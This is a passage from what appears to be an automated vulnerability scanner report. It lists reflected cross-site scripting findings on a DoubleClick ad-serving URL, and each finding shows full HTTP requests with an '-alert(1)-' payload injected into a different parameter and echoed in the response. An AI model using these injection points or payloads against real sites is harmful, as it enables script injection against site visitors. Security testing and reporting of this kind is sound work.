User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ0865cd9"-alert(1)-"c00625812dd&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo_Product_Media_2011");
var wmode = "opaque";
var bg = "";
va
...[SNIP]...

3.17. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c9b5"-alert(1)-"3964ead4cbb was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=7c9b5"-alert(1)-"3964ead4cbb&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
00/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=7c9b5"-alert(1)-"3964ead4cbb&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.2
...[SNIP]...

3.18. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95dde"-alert(1)-"27c33359beb was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=10095dde"-alert(1)-"27c33359beb&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
15177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=10095dde"-alert(1)-"27c33359beb&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/h
...[SNIP]...

3.19. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [ppartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55d6a"-alert(1)-"df904e7515b was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=55d6a"-alert(1)-"df904e7515b&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
om/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=55d6a"-alert(1)-"df904e7515b&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=tradition
...[SNIP]...

3.20. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45027"-alert(1)-"b3054c498ad was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=200145027"-alert(1)-"b3054c498ad&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4877

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
45620%3B4307-300/250%3B41437920/41455707/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=200145027"-alert(1)-"b3054c498ad&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011
...[SNIP]...

3.21. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [ra parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbf0c"-alert(1)-"48df8c28707 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243bbf0c"-alert(1)-"48df8c28707&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243bbf0c"-alert(1)-"48df8c28707&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo_Product_Media_2011");
var wmode = "o
...[SNIP]...

3.22. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [rqid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5235"-alert(1)-"df6b9809de9 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412f5235"-alert(1)-"df6b9809de9&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412f5235"-alert(1)-"df6b9809de9&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Produc
...[SNIP]...

3.23. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [sg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a7a4"-alert(1)-"f31f2c6fd97 was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=5071087a7a4"-alert(1)-"f31f2c6fd97&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4872

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
t/click%3Bh%3Dv8/3af6/17/16a/%2a/j%3B236574810%3B0-0%3B0%3B60245620%3B4307-300/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=5071087a7a4"-alert(1)-"f31f2c6fd97&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnm
...[SNIP]...

3.24. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14624"-alert(1)-"577924b55b4 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=17514624"-alert(1)-"577924b55b4&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4872

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
B0%3B60245620%3B4307-300/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=17514624"-alert(1)-"577924b55b4&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ0
...[SNIP]...

3.25. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2d31"-alert(1)-"628e648557c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047b2d31"-alert(1)-"628e648557c&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4876

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/16a/%2a/o%3B236574810%3B1-0%3B0%3B60245620%3B4307-300/250%3B41437920/41455707/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047b2d31"-alert(1)-"628e648557c&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssport
...[SNIP]...

3.26. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf16f"-alert(1)-"7e369353b08 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21cf16f"-alert(1)-"7e369353b08&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
